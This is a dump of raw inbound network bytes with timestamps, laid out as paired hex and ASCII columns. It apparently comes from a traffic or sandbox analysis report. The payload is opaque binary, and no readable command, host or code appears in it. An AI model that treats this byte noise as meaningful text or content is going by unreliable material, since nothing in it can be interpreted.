                                                                                                                                                                                      2021-10-30 11:52:05 UTC82INData Raw: a4 9b 0d a1 a5 03 8f 67 ac 2d e7 68 de 70 af 95 a3 26 67 cd 1d 35 ee cf 72 d4 90 b8 83 86 70 af c7 9e b2 08 f5 01 ed 41 38 d7 ba 46 08 5d 34 17 7c 4e 28 94 b4 70 bb 68 3b a2 57 5e d4 b5 44 78 5c 64 3a a1 bc 96 0d f4 8e 91 91 d5 4d 1c f1 fb 83 e2 ae db 9b a3 96 55 ee 71 81 4e 32 ca 4c 99 d9 7a 47 d1 80 66 a2 7c e1 71 91 e9 9c 2a bf 57 4e c8 8e d0 2f 26 c4 2f 38 d9 d1 77 2e 7a 2e 78 df 59 93 93 86 68 57 4d ce 5a bc d8 a3 c3 56 b1 36 0f 62 ff 49 4b a7 b8 a7 85 c7 9d 35 fa 2a ef 4c 25 8e 79 2b ad 78 a6 83 98 3f 6a 07 23 71 e8 a5 7b 70 fe e2 6e da d5 af 7e f5 a1 dd 34 ca f2 12 db e7 3f ff f9 5b cd a9 e8 57 a3 7a ff da f3 9e f7 bc 6d ce 01 b4 57 22 aa 3e cc f6 6d 16 cd 65 0f 25 f1 be 11 e3 6e 13 cb 46 5c 97 e5 8b 98 d7 4a 13 9f 91 11 64 17 43 70 5d 2f 3f 0b c1
                                                                                                                                                                                      Data Ascii: g-hp&g5rpA8F]4|N(ph;W^Dx\d:MUqN2LzGf|q*WN/&/8w.z.xYhWMZV6bIK5*L%y+x?j#q{pn~4?[WzmW">me%nF\JdCp]/?
                                                                                                                                                                                      2021-10-30 11:52:05 UTC83INData Raw: 7e f3 a1 dd 34 e6 c2 fb df ff fe cd 2b 5f f9 ca ad e6 64 f8 03 77 fd 89 fb b9 cf 7d ee e5 9a 68 ed a6 c5 b6 79 3a e6 89 4a 7f 18 68 ee eb 3a c8 84 f1 f4 c5 1b e1 de 81 e0 9c f1 a3 0b e4 13 9f f8 c4 e6 93 9f fc e4 22 c4 3f fe f1 8f 2f f1 cc 61 8b f5 21 8e d2 d1 a6 12 d9 3a 51 1f f3 21 cb cb e2 b1 6c af 5c 06 e7 55 a2 39 42 98 39 6a 38 61 ba 17 23 72 d2 94 8e 8e 9a 3e 38 03 ed 40 18 63 77 cc 74 bf 8f 92 9d df 28 3d 2a db 4a 0f 9e a7 fc a8 8b 12 6d 84 e7 8d 84 4e 4f 97 e5 3b 99 6d af 4c bc c6 63 5a ec ec a8 a9 62 3f 40 76 30 74 55 23 2a 54 c6 25 d3 57 30 48 71 a0 e2 60 ba b8 4e 71 27 a6 33 7a 36 ad fc b5 79 42 36 84 88 2e 3c dd 4c e5 a8 71 53 f5 4f bd c4 d1 e3 cc 71 c1 02 17 3b 17 be 6e 16 7e 63 40 fc c6 80 64 ce 1a 64 e7 a7 75 ce 46 f0 b1 f0 3e 0b 8f 3b b3
                                                                                                                                                                                      Data Ascii: ~4+_dw}hy:Jh:"?/a!:Q!l\U9B9j8a#r>8@cwt(=*JmNO;mLcZb?@v0tU#*T%W0Hq`Nq'3z6yB6.<LqSOq;n~c@dduF>;
                                                                                                                                                                                      2021-10-30 11:52:05 UTC85INData Raw: a8 8b 9b 9b 32 71 9c 33 e2 84 8a 2b 8f b1 8a e3 d5 43 c7 ca 50 1d aa 2f 3b 17 31 ed c4 b4 a8 f4 67 17 e2 98 7a 3a 8b 47 7b 8d 29 e3 9d a1 f3 1c cb 57 75 47 bd e7 45 32 5d 45 cb 96 f9 c8 ae b1 9f eb ef fb be ef 5b 9c 35 be fc cf 4e 18 8b 5e 56 07 65 fe e9 9f fe 69 73 fb db df fe 94 31 b8 c3 1d ee b0 b9 d4 a5 2e b5 38 21 3c fa e4 38 37 b8 c1 0d 4e 7a 6f 9a 7f d8 89 a0 93 7e 24 7e 1c f0 76 81 ce 3f 7d 17 e4 31 36 97 bf fc e5 17 c7 ec ab bf fa ab 97 9d c7 f3 9c e7 3c 8b b0 fb c8 bb eb 78 11 b0 3f 8e 66 9c 1c cd bd 88 74 71 5c 48 bb 48 e7 a1 a3 7a 62 08 2d 5d 45 95 ef 6d 42 e8 27 f7 57 42 9c 2c 84 f9 87 83 86 c8 11 93 63 e6 0e 9a 9c 38 c4 e7 16 c2 f1 11 3f 27 1e c6 b8 6c 3d 94 80 a7 47 c5 c9 f4 ae 9b 95 aa bc f0 78 0b d9 65 f6 bd 3a 66 8e d7 aa 3f cb e3 1c c6
                                                                                                                                                                                      Data Ascii: 2q3+CP/;1gz:G{)WuGE2]E[5N^Veis1.8!<87Nzo~$~v?}16<x?ftq\HHzb-]EmB'WB,c8?'l=Gxe:f?
                                                                                                                                                                                      2021-10-30 11:52:05 UTC86INData Raw: b9 b8 5e 63 15 c3 7d 8a 18 d5 ef 43 84 e2 a3 a1 d3 d3 55 71 31 63 2b 5a 79 a0 73 9c e1 79 53 8e da 28 9a bc bb a0 3a a2 cc c2 40 ad 91 16 ad 76 b4 ca 1e 46 de 08 94 47 b8 68 75 51 6b 67 0d e7 4b 8e 9a ef aa f9 23 50 1c 35 f2 b1 c5 b9 a3 3c f5 31 0e 5a a0 08 15 97 f8 79 6b 8d 59 46 ec b3 fa 10 f5 a2 b2 3f 3b 13 c7 d4 d3 bd 78 a5 73 3d e7 fa d5 af 7e f5 b2 88 f0 0b 47 76 95 f8 b2 38 bf 88 fc c9 9f fc c9 ad d5 01 9a 5b 5a 18 c0 cf 41 d4 e9 38 d2 57 78 7b 7a 70 6c df 4d 03 be e0 ce 4e 0f df 4d 63 21 64 5e 66 d0 0e e6 f5 0b 5e f0 82 ad 66 b3 f4 f1 9b bf f9 9b 17 27 0d 67 84 f2 fc 6d d4 db de f6 b6 ad c5 41 fb 58 58 d5 ce aa bd ba 1e 80 30 bb 3e 24 c2 e3 a7 1b c6 87 f1 15 b4 cd ff e5 01 e7 23 73 d2 80 71 c5 c1 f7 73 1d fb 0a 71 2e 64 73 23 b3 91 4e 71 4f 3b 51
                                                                                                                                                                                      Data Ascii: ^c}CUq1c+ZysyS(:@vFGhuQkgK#P5<1ZykYF?;xs=~Gv8[ZA8Wx{zplMNMc!d^f^f'gmAXX0>$#sqsq.ds#NqO;Q
                                                                                                                                                                                      2021-10-30 11:52:05 UTC87INData Raw: c6 31 45 b2 6b 41 e7 4b 22 a7 45 e7 d0 c7 ab 85 ec 64 ab 38 75 f8 31 66 ea cc e0 97 bf da 4d c3 f1 70 47 dd e1 38 fc bb c3 1f ff f1 1f 6f 35 07 a0 f7 3e 4a dc 59 53 1b 1d b5 39 d3 7b 9f 3c 3f b3 cd 42 88 b6 11 9d 2f 9d 7f 84 be 73 1d 20 da 45 93 63 26 f1 5d 34 24 db 45 a3 5e 8e 8f d0 97 38 36 2e 1a 1f 17 95 3d 0c 11 b3 7a 11 f3 a3 44 1b 91 c5 ab d0 e9 e9 aa f8 5a f6 51 07 e7 bf c5 90 a3 36 42 76 20 4d 6c 97 8c 5e be 93 d9 30 50 1a 2c c5 25 9a c4 23 93 39 23 3b de 68 5b ab 3a 2b 3d b4 f2 46 a8 fa 12 f5 4a 23 ba d8 b9 09 70 b3 c4 09 93 d3 86 63 16 05 7d dc 55 03 c6 c4 6f 62 c4 75 13 52 d8 1a 37 6f 13 22 14 cf f2 44 a6 3b bb 31 db 47 ec 75 63 d7 b8 f9 f8 2b 1e c3 08 75 c4 73 0d 9c 53 16 20 de 4a 4f 5c b8 8d a3 36 20 4a 3b 9e 1f a5 87 16 31 c1 a3 d9 99 c7 9e
                                                                                                                                                                                      Data Ascii: 1EkAK"Ed8u1fMpG8o5>JYS9{<?B/s Ec&]4$E^86.=zDZQ6Bv Ml^0P,%#9#;h[:+=FJ#pc}UobuR7o"D;1Guc+usS JO\6 J;1
                                                                                                                                                                                      2021-10-30 11:52:05 UTC89INData Raw: 56 f5 50 3f 42 5b e4 ac 11 e2 88 45 21 4f f9 9a cb aa 47 e8 1e 46 58 89 e7 13 57 5a f1 51 c9 ca 40 d4 65 52 d9 55 fa 4a 62 1b 7a 6d ca e2 59 08 2d 1d 8c e6 43 15 87 9e 5d 0c 05 e9 38 07 09 25 31 ed ba 93 c2 b5 8e 5a 8c 67 e9 c3 90 0c 06 43 a2 49 50 85 51 54 de 43 70 dd 8c a8 8c 13 d3 4e 2b 6f 84 5d cb 0b 8d ad 8f 75 76 a3 d2 cd ca e3 b2 51 79 39 57 72 d2 24 e8 dc f1 a2 ed 51 94 e7 b6 0a 95 2f 5b 50 38 03 37 52 5e 2b f1 2d df f2 2d cb 62 a1 5f af a1 f7 1b aa c3 71 71 7e 70 dc 78 55 05 0b e8 5b df fa d6 45 0f e8 58 e8 05 0e 5d 5c 64 81 e3 71 9c bf fe eb bf de 6a e6 c0 29 bb fe f5 af bf 38 68 3c 72 44 d0 b1 e0 79 fb 19 6f 1c 34 1e 3f f1 18 ef bd ef 7d ef a2 07 9d d7 78 ce 81 f1 f4 1d 1e 16 57 1e 01 b6 16 66 ec 5f f3 9a d7 2c bb 58 bb a2 45 4e c7 50 bb 20 6b
                                                                                                                                                                                      Data Ascii: VP?B[E!OGFXWZQ@eRUJbzmY-C]8%1ZgCIPQTCpN+o]uvQy9Wr$Q/[P87R^+--b_qq~pxU[EX]\dqj)8h<rDyo4?}xWf_,XENP k
                                                                                                                                                                                      2021-10-30 11:52:05 UTC90INData Raw: e9 b0 91 ad 8e 4b 3d 1a 37 8d 21 e7 a4 12 e5 7b 18 e3 87 25 de c6 11 3d d2 ca 8b 6d ee f5 c1 eb 52 3c 0b 61 56 07 bb c4 a1 4a c7 10 a2 ad d0 1c f3 78 94 98 e7 9c 7a b5 0f e0 95 c4 0a 85 1f 70 c4 66 96 38 38 c8 e8 04 57 19 e1 71 88 e9 c8 9a f6 8a 5e dd 47 05 ed c8 24 e6 31 8e 08 37 5e 39 5c 08 8b 95 44 69 42 ec b0 77 fc 3c 6b ec aa 31 f4 36 28 cc 74 b3 b0 68 5f fa d2 97 5e be 6f c4 77 67 be fa ab bf 7a 71 d8 b4 2b c5 27 7f 3e ed bb d3 c6 4d 57 37 6f dd c0 b9 21 63 7b ae 73 9d 6b 71 46 58 ac 66 84 1d 1e 8e e9 8f 22 5b 70 2c de 53 c6 6e 15 7d e0 fb 4b e7 3b df f9 96 ba 68 b7 1c 35 da 07 8c 3d e7 82 1d 2b 42 f4 38 a3 b7 b9 cd 6d 96 7c 11 c7 50 e7 23 ea 39 26 63 a1 fa 33 28 fb 81 0f 7c 60 9b 3a f8 7f cd 7b dc e3 1e 8b 63 80 83 87 b0 b0 47 e1 fb 4a fc 4d 13 8f
                                                                                                                                                                                      Data Ascii: K=7!{%=mR<aVJxzpf88Wq^G$17^9\DiBw<k16(th_^owgzq+'>MW7o!c{skqFXf"[p,Sn}K;h5=+B8m|P#9&c3(|`:{cGJM
                                                                                                                                                                                      2021-10-30 11:52:05 UTC91INData Raw: ea e5 fb 3d fc 71 38 5f 3e 17 9c 1f 76 ef 58 fc b0 89 0b 49 6f ce 72 dc d1 dd 29 c6 81 37 fb b3 5b 89 23 4b c8 4e 0e 6d 66 31 6b 95 65 b1 64 0c 71 7c 6f 77 bb db 6d b5 07 68 ce 08 c5 09 c9 a3 8f 0e 75 50 57 cb b1 04 76 86 78 0d c7 2f ff f2 2f 2f 63 8b e0 94 b2 18 f7 da 2b 68 37 bf a6 74 bc ad 0e 7a 09 ed ce 76 a6 d8 59 d4 39 f6 e3 13 c7 31 e0 bb 82 0e 75 55 f7 47 87 7a 39 7f 8c 89 d7 4d 7a 76 57 ed af fe ea af 96 f6 ef 13 8e c7 f5 e9 df f7 73 c8 97 c4 f9 20 d0 73 dd 32 1f 64 13 05 18 2f fa cf b9 93 73 86 c8 39 e3 fc bb 73 86 a0 47 b0 f1 71 a4 0e ea d2 39 e0 b8 88 da 50 09 6d 89 e1 61 8a 33 a3 cf 74 22 e6 79 ba d2 49 84 e2 55 d8 63 d4 0e dc b6 55 6e a6 ce 51 5a f7 59 f2 62 be d2 ae ef df 8d 02 55 a5 11 f4 3d 59 03 03 e9 e2 13 bd 35 e9 55 b6 a2 95 b7 2b 87
                                                                                                                                                                                      Data Ascii: =q8_>vXIor)7[#KNmf1kedq|owmhuPWvx///c+h7tzvY91uUGz9MzvWs s2d/s9sGq9Pma3t"yIUcUnQZYbU=Y5U+
                                                                                                                                                                                      2021-10-30 11:52:05 UTC93INData Raw: b7 b3 13 c6 e2 c9 62 41 bd 15 d4 85 a3 c9 23 bc 08 0b 11 3b 5a 7c c7 8c 45 06 47 cd d1 9c 25 a4 9e d8 2e fe 33 14 47 8d f2 bd dd 29 ca b2 e0 b2 d8 fb 5b f4 05 8f cb f8 61 c4 c7 3e f6 b1 c5 ae 05 8b 28 ef 63 a3 cd 42 f3 45 68 0e 31 a6 0e 2f d6 d5 82 3a 72 4d aa dd ec cc bc e1 0d 6f d8 6a 0f 9c 17 9c ce 11 47 8d 3a e2 23 bb 0c ec 62 9b 39 47 fc 65 15 8f b7 7b bb a7 94 e5 87 21 ad f1 d3 b9 74 a8 b7 f7 3d 43 f4 fc 50 66 14 7e 41 cc d8 70 dd f4 c6 a7 05 63 f1 c2 17 be 70 f3 07 7f f0 07 5b cd 01 f4 c3 c7 51 63 e7 f0 7e 3f ae 13 84 f9 e5 a8 bc 44 ce 15 21 63 2b 27 8d 7e 33 de ee a0 b9 73 96 ed a2 81 da 23 a1 1f 12 d7 23 d8 ce ca 28 59 59 89 93 e9 ab b4 eb c0 f5 a3 92 51 e9 2b 7a f6 9e 3f 5b 77 45 ac a7 aa 57 fa d6 71 35 57 c0 e3 15 3d 9b a6 a3 a6 c2 ad 4a 7a 07
                                                                                                                                                                                      Data Ascii: bA#;Z|EG%.3G)[a>(cBEh1/:rMojG:#b9Ge{!t=CPf~Apcp[Qc~?D!c+'~3s##(YYQ+z?[wEWq5W=Jz
                                                                                                                                                                                      2021-10-30 11:52:05 UTC94INData Raw: 05 b0 55 1f 30 1e 2c 74 d9 6e da b7 7e eb b7 2e bb 61 ec 2e f1 6b 44 16 5f de 71 e6 68 01 f2 31 16 38 68 94 1f 69 0b 8b 55 fc 8e 11 f5 b2 c8 69 ee c7 6b 80 3f dc c6 39 6e 7d d7 8a e3 71 7c 16 e3 16 d8 f1 5f 9d fc 10 80 f7 cd b1 d3 43 99 56 9b e9 2f c7 e6 97 96 d9 0e 15 fd c7 51 ee ed 42 01 75 c5 47 e7 b1 bf d8 68 ce 0b 1c 01 be cf 27 c7 1c 67 ba e7 98 03 3f 46 71 38 96 1f 2f 9e 4b 1c 1a ed 3c f5 76 19 79 34 dd 03 a7 0f d1 f7 27 9f f9 cc 67 6e 73 0e c0 f9 e4 dc f6 5e 55 c3 bc e1 78 d5 6e 9a 13 fb c4 b5 a7 9d 6c ce 4f fc 21 10 3a c6 32 3a 67 48 74 d0 e4 a4 c9 41 a3 0c 63 e4 e3 ea e7 cf c5 f5 c4 25 31 ad 3a 46 c5 c9 f2 a3 38 3d bd a8 d2 ae 13 31 cf d3 3d 91 bd c8 74 62 24 0f aa b8 18 b1 8d e5 66 f3 62 d8 22 9b d3 4e 2b df f3 ca 2b 57 46 6e 9c 55 8a 2e d3 ef
                                                                                                                                                                                      Data Ascii: U0,tn~.a.kD_qh18hiUik?9n}q|_CV/QBuGh'g?Fq8/K<vy4'gns^UxnlO!:2:gHtAc%1:F8=1=tb$fb"N++WFnU.
                                                                                                                                                                                      2021-10-30 11:52:05 UTC95INData Raw: 5b 28 cb 0e 4c dc 15 89 b0 00 b2 ab c3 77 de 78 64 c5 bf 38 b0 9b 45 3b 41 e7 3b 83 63 f3 3d ae 37 bd e9 4d cb e3 c5 9f fe e9 9f 5e 9c 1c ce 01 ce 14 e7 81 be e2 54 8e 38 69 3a 1f 67 9d 75 d6 56 73 2a aa 8f 73 c1 b9 a5 fd 19 aa 0b 27 cb d1 f8 02 36 d1 11 66 d7 93 31 d6 3b d3 d8 59 e4 8f e1 7b 50 d7 eb 5e f7 ba 6d ea 80 78 5f f1 71 a4 1d 1c 87 39 da 7b ec 49 39 fe 32 ab 45 dc 4d e3 7b 89 fc 09 bf c3 bf 49 30 6e ad e3 71 be df f3 9e f7 a4 bb 69 12 e1 fd 01 e6 8c ae 3d 8e c1 23 74 ea 12 e8 70 c4 e4 98 45 a1 dd 0a e5 a4 65 bb 69 b4 31 0a 6d 41 3c de 13 91 e5 ad 15 a7 ca 1b d1 79 5a 3a 88 fa 35 e2 f5 28 9e 85 30 93 07 87 11 87 56 3a e6 39 ad bc 16 f1 da 15 99 5e ba f4 ea 9d ad 48 b2 2b 74 7c 44 a2 ad a8 e2 4e a6 1f d5 55 a8 ef 3e 16 12 e1 71 67 e6 38 ce 4c b9
                                                                                                                                                                                      Data Ascii: [(Lwxd8E;A;c=7M^T8i:guVs*s'6f1;Y{P^mx_q9{I92EM{I0nqi=#tpEei1mA<yZ:5(0V:9^H+t|DNU>qg8L
                                                                                                                                                                                      2021-10-30 11:52:05 UTC97INData Raw: 06 f5 eb d7 b8 ec 78 ea d7 a2 38 b2 38 99 f4 31 6b bb c6 c0 7f f1 a9 71 d3 f1 9c 99 7f cc a0 7c eb fb 69 fc 5b 06 e7 b2 b5 9b 46 5b 70 0c c9 6f 5d 17 8c 49 dc 85 c4 d6 45 63 e8 c4 dd 34 9c 5a 7f 77 1a e7 09 c7 9f eb 87 be 32 d7 08 69 0b 42 9a 50 0e 9b 1c 38 ca 71 3c bf 27 73 ec e3 2c 55 1b 33 fd a8 ae 25 cc ad 4c 2f f1 fa b2 b8 88 ba 56 9e 53 d9 65 7a a8 e2 30 9a 07 99 6d 0c 45 4c 67 f8 1c 8b 64 79 99 6e 78 65 a8 0e 86 5e 32 8b 77 3e c6 47 45 65 3c 74 46 75 30 ab 8f 68 0c 46 c7 63 b4 5e 18 b5 9d a9 33 63 d7 f2 3d a8 3f 13 bf 29 1c 37 66 76 d3 e8 47 f6 45 fb 6c 3e b0 78 6b 41 19 71 5c 04 63 c4 c2 f7 a1 0f 7d 68 f9 de 13 bb 1e f1 bb 57 2c 44 5a 8c 84 ca 09 f2 7c c7 84 1d 98 56 df 80 f2 71 37 89 3f 35 e7 5d 70 bc 74 96 5f 9d e2 f4 51 17 fd c1 79 e2 e5 c2 fc
                                                                                                                                                                                      Data Ascii: x881kq|i[F[po]IEc4Zw2iBP8q<'s,U3%L/VSez0mELgdynxe^2w>GEe<tFu0hFc^3c=?)7fvGEl>xkAq\c}hW,DZ|Vq7?5]pt_Qy
                                                                                                                                                                                      2021-10-30 11:52:05 UTC98INData Raw: fa 11 a7 2c 8a d7 a1 b8 88 ba 56 1e cc ea 44 2b 3d 63 0b 31 2d 46 ed 66 d0 5c 8d 64 7a e9 4e cc ca 68 94 a5 b3 8a 40 79 55 7e 84 ce 8e 8a 13 75 8a 67 3a 27 d3 41 a5 87 d1 32 99 dd cc 58 54 b4 da 16 99 b1 8d ec 52 56 50 c7 6c 3d b2 f7 72 6b ea 39 4c 66 77 d3 de f7 be f7 9d f2 c6 76 a8 e6 c2 ec 35 93 fd d7 a3 16 22 42 5f 64 a8 57 e3 19 17 75 1e c5 b9 13 f1 9a d7 bc 66 f9 83 fa 16 d4 83 53 a1 5d 32 de 6f 76 a9 4b 5d ea c4 4e 14 0e 0e ff 38 c0 77 e6 b0 6d c1 ce 49 ef 3b 65 e8 f9 8e 9a a0 3f 8c 7f 1c 2f ed a8 21 d5 58 d2 9e d6 ee 1c af ce 68 ed 0a 81 fa cf df 72 39 d2 3b 38 2d bc 33 8e ef eb c9 d9 e1 7b 6d 3c c6 75 c8 e7 dc d0 ee 99 b6 a3 f3 71 e3 fc cf fc ff 2c 70 5c ff 77 0b 71 f9 cb 5f fe a4 d7 88 f0 dd 32 fe 48 3f 83 73 8f 70 0e e4 30 47 68 6b fc f1 09 6d
                                                                                                                                                                                      Data Ascii: ,VD+=c1-Ff\dzNh@yU~ug:'A2XTRVPl=rk9Lfwv5"B_dWufS]2ovK]N8wmI;e?/!Xhr9;8-3{m<uq,p\wq_2H?sp0Ghkm
                                                                                                                                                                                      2021-10-30 11:52:05 UTC99INData Raw: 0b 47 84 5d 91 7d ee a6 45 d8 69 62 d7 00 27 81 45 87 5d 35 2d 06 19 1c 23 fe 22 2e ce 2f a5 b1 cd 9c 34 1c 42 7e a1 a9 f7 9c e1 28 f0 5e 33 6c 79 4d 07 f5 57 ce 1a 75 52 1f bb 30 80 a3 46 1f f8 5e 17 21 2f 20 f5 f3 a8 05 4e ed f3 3c e0 91 1f 63 5a f5 99 76 c4 ef 82 79 5f 1d c6 6f 84 6a 47 8d b1 60 0e c8 81 a8 da c4 a2 e6 3b 43 11 9c 7b 9c 0c de 97 c6 dc c1 49 e3 df 1b f8 b7 86 0c 39 22 2d 07 91 71 8b 7f 07 e6 f0 78 95 f7 d7 e1 5c f1 85 7d e6 21 63 df 83 be e8 85 bb c0 77 d2 78 cd 8a fe 39 42 8f 3c b3 1f 10 08 ce 87 6c ab 71 a3 fd f1 f5 31 da 65 e5 1c 7f f2 93 9f dc 6a 0f 60 4c b2 1f 60 f8 fc d1 31 75 3c 42 da 42 88 c8 e9 e2 38 84 a4 c9 97 83 c6 71 e5 a0 a8 1c 36 2a 27 21 ad 3a b1 43 1c ca 4b 62 7a 56 aa f2 99 3e d3 ad d1 8f 8a 97 57 dc 89 7a cf df 87 4e
                                                                                                                                                                                      Data Ascii: G]}Eib'E]5-#"./4B~(^3lyMWuR0F^!/ N<cZvy_ojG`;C{I9"-qx\}!cwx9B<lq1ej`L`1u<BB8q6*'!:CKbzV>WzN
                                                                                                                                                                                      2021-10-30 11:52:05 UTC101INData Raw: 1d 78 dc 69 d9 f4 d2 30 aa 13 ca ab c2 19 5a 73 a4 ca 73 7d 8c a7 77 89 ac 22 74 99 1e 2a 3d 1d 94 78 3a c6 33 dc ce a9 ca ac b5 73 d6 e6 1d 26 6b 8f bb 8f f6 ee ab cf b1 1e a5 5d bf af 63 45 58 38 79 29 27 8f a5 58 90 70 12 b4 30 23 dc 8c b1 61 27 84 7c 84 78 6f a7 8b 9b 3c bb 11 d5 8b 54 e9 4f ec 13 37 7c be fc 3d bb 9b c6 e2 c0 6e 02 0b 85 a0 6e 5f 80 b8 f9 3a 2c 6a 38 11 ee a4 49 e7 5f ac e7 7b 4e 38 5e 2a 1f af 65 8e c3 c2 ea 3b 23 2c 76 72 08 94 ce 50 1b 05 75 5f ed 6a 57 5b 1c 54 16 63 c6 c3 17 78 ea e3 51 97 ef 7e f5 16 46 9c cc 16 d4 c9 f8 64 0e 0f 8b 71 ef f1 1d d0 8f f8 8b 5b 9c 8b 7b dc e3 1e 27 9c 34 9c 0c ea e2 3f 5e 79 a4 ee 70 de 62 1f 5a 8f 7f 81 63 66 2f ba e5 95 2e 38 da 9a cb fc ff 29 3f e6 e0 57 b8 f1 bc 54 b0 d3 f7 86 37 bc 61 f9 50
                                                                                                                                                                                      Data Ascii: xi0Zss}w"t*=x:3s&k]cEX8y)'Xp0#a'|xo<TO7|=nn_:,j8I_{N8^*e;#,vrPu_jW[TcxQ~Fdq[{'4?^ypbZcf/.8)?WT7aP
                                                                                                                                                                                      2021-10-30 11:52:05 UTC102INData Raw: 41 2f e7 a2 b2 41 a7 5d 57 76 d1 f8 1e 1a c7 64 1c 39 5f ec 44 e1 70 00 76 38 12 ea 4b 1c a3 0a 6c 7f fd d7 7f 7d d9 1d 74 28 8f d0 06 c5 95 76 b8 0e b8 6e b2 79 8b 2d ef 65 a3 8f 11 f2 fc bb 93 72 76 f9 93 78 7e cc e3 b0 9b c6 dc 94 73 84 c8 49 43 e4 54 e1 a0 21 1a 53 a0 4d 8c 09 4e 59 14 39 6b 08 36 cc 59 8d 1d e5 75 7e a8 d3 9d 35 74 95 c3 26 b2 f9 84 2e 93 2c 6f 17 5d 4b 74 cd b6 44 75 8e 84 30 ab 83 d9 38 f4 d2 b0 8b 2e 22 9b 11 5b 88 73 c0 59 9b e7 9c 7a 87 f8 0c b1 30 e9 d1 0a e9 98 24 4b cf 10 cb b4 ea c9 f4 ad 63 ae cd 13 23 36 3d 46 c7 74 84 5d da b3 8f be 50 87 a4 85 f2 f7 71 cc 19 38 5e f6 f2 50 6e b8 fc 22 54 ff 3d 39 d2 2e 76 36 22 94 43 32 a7 81 1f 33 f0 1d 22 1e ef e0 a8 b0 f8 00 df 2f 02 16 78 5e 2e 8a d3 c6 c2 91 c1 82 c0 23 5b be bb c3
                                                                                                                                                                                      Data Ascii: A/A]Wvd9_Dpv8Kl}t(vny-ervx~sICT!SMNY9k6Yu~5t&.,o]KtDu08."[sYz0$Kc#6=Ft]Pq8^Pn"T=9.v6"C23"/x^.#[
                                                                                                                                                                                      2021-10-30 11:52:05 UTC103INData Raw: 97 5f 64 e2 e8 c4 5f 36 b2 78 d3 3e 44 c4 be e0 44 f0 2e bb de 4e 1e 65 18 0b 39 21 38 e6 0f 7f f8 c3 b7 b9 9f 85 9d 54 39 12 3a 7e 06 7d e3 31 e5 43 1f fa d0 72 27 4d 63 ab f6 7a bb 89 cb 11 12 7c c0 e0 b1 35 63 1f 77 d5 68 3b 4e 26 1f 40 b0 e3 f1 3b 73 8e 47 c7 7a 2c 4f 9d b7 bd ed 6d 4f 79 31 2e d7 09 e5 d5 1e 39 43 84 e8 e9 27 36 5c 0f 72 a0 e4 a8 d1 2f df 4d 73 07 4d c2 dc 93 48 47 19 77 d4 38 4e 74 d4 fc 58 ee a8 d1 46 1f 2b 8d 2d 61 94 4c bf 8b 4e 7a 91 e5 d3 af 4c ef f6 8a f7 c2 a8 83 96 0e 46 e2 30 9a 27 46 75 30 a2 57 bc b2 75 fc 7c 3b b3 fa 11 4e b9 a2 63 65 bd ca 63 27 5d 2a dd 0c 55 59 a5 2b 7d 45 2f bf c5 6c dd 99 7d 36 9e 6b 4f e0 da be ac 29 47 19 c9 be d8 67 5d 15 ec 5e e0 f8 70 a3 e2 11 a7 60 cc 79 07 1a 8f 08 71 20 70 d6 b8 e9 8e 9c 0b
                                                                                                                                                                                      Data Ascii: _d_6x>DD.Ne9!8T9:~}1Cr'Mcz|5cwh;N&@;sGz,OmOy1.9C'6\r/MsMHGw8NtXF+-aLNzLF0'Fu0Wu|;Ncec']*UY+}E/l}6kO)Gg]^p`yq p
                                                                                                                                                                                      2021-10-30 11:52:05 UTC104INData Raw: df 2b 7f 61 c5 5c d2 ee 96 a3 3a 80 31 e4 7a 8c ff de c0 18 c8 49 a3 bc da 87 8e 3a e5 a8 31 af b8 1e 98 5b 9a 5f 94 d1 f5 80 83 e6 82 0e a1 9d 6a 33 63 ad 36 69 0c 74 3c 44 6d 20 c4 c6 fb 43 59 09 75 4a 94 8e f9 b1 8c 24 d3 ef a2 43 e2 f1 5d 1c d7 8d 86 90 c5 7b f9 50 c5 61 34 4f 8c ea a0 d2 83 f2 dc 26 d3 81 e6 ae 87 92 98 76 a9 f2 46 f4 8a 2f e1 67 3e f1 9e 68 51 65 18 d3 2d aa 81 f1 72 b1 ae 58 a7 0f 56 25 ca 17 1e 8f b4 f2 e0 30 ca 46 bd d2 84 92 2a ed 61 46 2b af 62 b4 cc 9a ba 47 89 7d 23 cc 74 87 01 0e 1a 0e 02 3b 68 dc f0 b9 a1 71 f3 65 01 40 b8 21 3b e4 73 93 c7 01 d2 5f 1a b1 33 c4 ae 0d 3f 10 c0 11 51 19 16 56 9c 30 ec 09 81 c5 85 45 45 8b 16 7a 1e 39 f1 fd 20 47 0b 02 fd 66 11 d1 8d 3d c2 63 23 bd 60 f5 72 97 bb dc f2 a8 89 1d 2d 5e c4 1a 77
                                                                                                                                                                                      Data Ascii: +a\:1zI:1[_j3c6it<Dm CYuJ$C]{Pa4O&vF/g>hQe-rXV%0F*aF+bG}#t;hqe@!;s_3?QV0EEz9 Gf=c#`r-^w
                                                                                                                                                                                      2021-10-30 11:52:05 UTC106INData Raw: 88 d7 81 8f 07 37 60 49 84 72 5a e4 b4 00 65 75 b1 70 08 16 9d 27 3c e1 09 cb 17 fe b3 9d 18 16 15 5e a8 ca 2f f4 04 75 53 ce fb 27 69 b5 4f 64 6d 8c ed 74 94 e7 76 8a bb 08 e2 1c df db 04 c4 65 47 5c 78 5c a8 ac e2 82 36 83 1f 4f c8 2e e6 91 96 4e 71 89 8e c3 38 b3 90 6b 31 77 a2 53 88 bd 9c 0d c1 6e 1a 7f c1 24 67 3b ee 8a 02 f5 3e f3 99 cf 5c 7e 81 2c a8 3b fb 60 21 62 7b 25 6a 8b 43 7b d4 8f 51 c7 13 bc 7f aa 57 a2 f6 e9 d1 24 ce 12 8e 93 1e 79 6a 57 0d e7 8a 39 c9 b1 f9 20 82 93 24 c7 49 8f 22 dd 61 d2 b8 eb 38 1c 03 61 dc 10 39 84 ee a8 21 72 e4 d4 56 8e 85 c8 31 c3 49 d3 0e 1e c7 e6 98 38 88 d8 b8 b3 c6 58 f9 1c ad 04 5a e9 4a 7a 75 7b 3d 8a 67 21 cc ea 60 24 0e a3 79 10 d3 62 17 bd e2 84 1e f7 30 c2 7c 51 28 89 e9 4a 27 a9 f2 a2 de d3 e2 1c e7 39
                                                                                                                                                                                      Data Ascii: 7`IrZeup'<^/uS'iOdmtveG\x\6O.Nq8k1wSn$g;>\~,;`!b{%jC{QW$yjW9 $I"a8a9!rV1I8XZJzu{=g!`$yb0|Q(J'9
